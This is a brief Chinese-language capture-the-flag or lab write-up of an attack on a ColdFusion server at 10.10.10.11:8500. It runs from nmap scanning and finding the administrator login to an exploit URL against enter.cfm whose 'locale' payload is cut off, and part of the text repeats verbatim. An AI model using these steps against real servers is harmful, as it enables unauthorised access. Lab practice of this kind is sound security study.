1、nmap
看不懂有什么有价值的,连80都没有。
只能带着端口进去看。10.10.10.11:8500
信息搜集了一番,是coldfusion,有好多文件,找到带administrator的那个,就看到登录框了
2、cold漏洞利用
找漏洞,找到这个漏洞
执行
http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=
看不懂有什么有价值的,连80都没有。
只能带着端口进去看。10.10.10.11:8500
信息搜集了一番,是coldfusion,有好多文件,找到带administrator的那个,就看到登录框了
找漏洞,找到这个漏洞
执行
http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=